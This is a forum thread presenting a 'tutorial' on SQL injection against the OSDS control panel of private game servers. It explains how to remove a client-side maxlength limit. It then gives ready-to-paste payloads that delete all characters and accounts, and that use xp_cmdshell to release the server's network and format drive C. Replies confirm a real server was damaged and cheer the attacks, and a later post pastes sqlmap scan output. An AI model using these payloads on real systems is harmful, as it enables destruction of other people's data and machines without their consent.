[Tutorial]How to SQL inject into a server with OSDS

[Zombe]

This is a nice trick how to bypass janvier's anti-sql-injection, that he put into OSDS in just a few steps.

First, get .
Find a server that has an OSDS control panel and go to the panel login page.
Now, janvier's anti-sql-injection comes in. You can't write more then 12 letters, so you can't inject anything decent...

 Spoiler

So here's what we do. Press Ctrl+U to open up the source code and press Ctrl+F to open up search in the sourcecode. Search for "maxlength" (without the quotes). You will come to something like

HTML Code:

maxlength='12'

 Spoiler

So delete that parameter.
Not the whole input, just the maxlength parameter, so the line

HTML Code:

<input type='text' name='accname' maxlength='12' />

should look like

HTML Code:

<input type='text' name='accname' />

Then, press "Apply Changes" at the top, and close the sourcecode tab.
Hooray! We can write as long as we want ^^

And from now on, we inject the same way as we would normally.
Note: After the page is refreshed, you have to remove maxlength again.

After you inject, you should see a screen like this:

 Spoiler

A few good injections:

Code:

a' DELETE FROM character..user_character--

(Deletes all characters)

Code:

a' DELETE FROM account..Tbl_user DELETE FROM character..USER_PROFILE--

(Deletes all accounts)

And for the more drastic ones:

Code:

a' exec master..xp_cmdshell 'ipconfig /release'--

(Disconnects the internet from the server)

Code:

a' exec master..xp_cmdshell 'format "C:/"'--

(Formats drive C)

Janvier, I hope your CMS is protected a little better... Haven't tried it on CMS yet.

IMPORTANT:
SQL injections are illegal, and if you do so, you do so on your own free will, knowing that legal action may be taken.
This tutorial's maker does not take any blame for the damage this may have caused. If users are to use this, they do so on their own will. This tutorial was made for teaching purposes only. User discretion is advised.

[draegon71]

Thank you Zombe for your awesome tutorial.You deserve much more than a big Thanks.
Remember, this is illegal so dont abuse too much ...
Vote for sticky.
[x]Ruin every thread made by janvier123

[Zombe]

Quote:

Originally Posted by draegon71

[x]Ruin every thread made by janvier123

Well, that goal is just a joke, but honestly, it made me laugh now

[pieter]

thanks for not using the format thing yet zombe!

removing osds now

[Zombe]

Quote:

Originally Posted by pieter

thanks for not using the format thing yet zombe!

removing osds now

Lol, sry for ur server. I was just testing, didn't really think janvier's protection was so weak, I was 95% sure it won't work... Sorry for ur server, RLY sorry...
If anything, I can DEV for u a while to help you get your players back.

I'll also make a tutorial on how to prevent SQL injections. But I have to think of a decent way myself first.

[pieter]

Im running it on leeched files, it wouldnt be honest to ask u to dev on other person's files

oh and i backup all databases every 30 minutes, because i didnt trust the 1click

its a fun server nothing big or commercial lol, still thanks for the advertising lol

[Zombe]

Quote:

Originally Posted by pieter

Im running it on leeched files, it wouldnt be honest to ask u to dev on other person's files

oh and i backup all databases every 30 minutes, because i didnt trust the 1click

its a fun server nothing big or commercial lol, still thanks for the advertising lol

****, didn't think about advertising... Forgot to blur the link >_>
Ill do that in a little while.

[pieter]

awww. and i was about to hit report on you _O-

nah its back up, disabled osds and registration for the time being (had the same bug)

[janvier123]

i hate you know zombe

[Zombe]

Quote:

Originally Posted by janvier123

i hate you know zombe

Just add some protection, like preparing queries, etc ^^
You should thank me for pointing out ur mistake

[EliteWarrior]

Well good job to Zombe,but i already knew it was vulrnable to sql injection try to perfect out youre script janvier123 this is the mainreason im not using it.

[҉ THT ҉]

This mean; OSDS = DIE
Thanks to zombie xD LOL

[Zombe]

Tested and works on CMS ^^

[janvier123]

Analysing URL [/dkcms/V0.1/?dkcms=main]

[+] working on dkcms
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[+] Method: SQL Blind Statement Injection
[+] Method: SQL Blind String Injection
--- No results here means that SQLiX found no injection point ---


--- Now sqlmap will test your url ---

[*] starting at: 09:21:09

[09:21:09] [INFO] testing connection to the target url
[09:21:10] [INFO] testing if the url is stable, wait a few seconds
[09:21:14] [INFO] url is stable
[09:21:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[09:21:15] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[09:21:15] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
[09:21:16] [WARNING] Cookie parameter 'PHPSESSID' is not dynamic
[09:21:16] [INFO] testing if GET parameter 'dkcms' is dynamic
[09:21:18] [INFO] confirming that GET parameter 'dkcms' is dynamic
[09:21:20] [INFO] GET parameter 'dkcms' is dynamic
[09:21:20] [INFO] testing sql injection on GET parameter 'dkcms' with 0 parenthesis
[09:21:20] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:21] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:21] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:22] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:22] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:24] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:24] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:25] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:25] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:26] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:26] [INFO] GET parameter 'dkcms' is not injectable with 0 parenthesis
[09:21:26] [INFO] testing sql injection on GET parameter 'dkcms' with 1 parenthesis
[09:21:26] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:27] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:27] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:29] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:29] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:30] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:30] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:31] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:31] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:32] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:32] [INFO] GET parameter 'dkcms' is not injectable with 1 parenthesis
[09:21:32] [INFO] testing sql injection on GET parameter 'dkcms' with 2 parenthesis
[09:21:32] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:34] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:34] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:35] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:35] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:36] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:36] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:37] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:37] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:38] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:38] [INFO] GET parameter 'dkcms' is not injectable with 2 parenthesis
[09:21:38] [INFO] testing sql injection on GET parameter 'dkcms' with 3 parenthesis
[09:21:38] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:40] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:40] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:41] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:41] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:42] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:42] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:43] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:43] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:45] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:45] [INFO] GET parameter 'dkcms' is not injectable with 3 parenthesis
[09:21:45] [WARNING] GET parameter 'dkcms' is not injectable


To bad zombe,

[draegon71]

yep is working at dkcms too ... FAIL
I Tested at my server ^^